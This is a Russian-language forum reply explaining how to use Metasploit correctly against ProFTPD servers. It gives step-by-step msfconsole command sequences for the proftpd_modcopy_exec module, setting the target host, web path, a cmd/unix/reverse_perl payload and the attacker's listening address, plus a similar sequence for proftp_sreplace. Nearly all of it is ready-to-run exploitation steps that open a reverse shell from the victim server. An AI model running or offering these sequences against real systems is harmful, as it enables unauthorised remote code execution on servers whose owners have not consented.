Добрый день.
Вы указываете не payload , а другой эксплойт.
К тому же ещё дублируете :>set payload exploit
После выбора рекомендуется просматривать опции командой show options.
Так Вы будете ориентированы в том,что от Вас требуется для атаки или теста.
И ,смотря какую CVE пытаетесь эксплуатировать.
Если работать с proftpd_modcopy_exec,то алгоритм может быть таким :
Код:
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(proftpd_modcopy_exec) > show targets
msf exploit(proftpd_modcopy_exec) > set TARGET id_цели
msf exploit(proftpd_modcopy_exec) > show options - проверяем опции,сверяем
msf exploit(proftpd_modcopy_exec) > exploit
Эксплуатация с задействованием демона proftpd на сервере FTP может быть такой:
Код:
msf> use exploit/unix/ftp/proftpd_modcopy_exec
set RHOST IP_цели
set SITEPATH /var/www/html/имя_тестовой_директории
set TARGETURI /имя_тестовой_директории/
set PAYLOAD cmd/unix/reverse_perl
set LHOST IP_атакующей машины
> run
Либо можете провести стандартную атаку:
Код:
msf > use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost IP_цели
msf exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
msf exploit(unix/ftp/proftpd_modcopy_exec) > run
И с модулем proftp_sreplace ведётся аналогичная работа с таким алгоритмом:
Код:
msf > use exploit/linux/ftp/proftp_sreplace
msf exploit(proftp_sreplace) > show targets
msf exploit(proftp_sreplace) > set TARGET id_цели
msf exploit(proftp_sreplace) > show options
msf exploit(proftp_sreplace) > exploit
Из опций только не забываем указать необходимые параметры.